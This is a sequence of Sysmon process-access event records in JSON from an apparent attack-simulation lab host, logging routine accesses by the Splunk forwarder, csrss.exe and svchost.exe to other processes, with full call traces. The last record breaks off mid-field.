{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3067,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10EB-5F25-0000-0010F73D0500}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10EB-5F25-0000-0010F73D0500}","TargetProcessId":"4504","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3068,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10EB-5F25-0000-0010F73D0500}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10EB-5F25-0000-0010F73D0500}","TargetProcessId":"4504","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3069,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3070,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3071,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3072,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3073,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3074,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:23.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3075,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:23.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 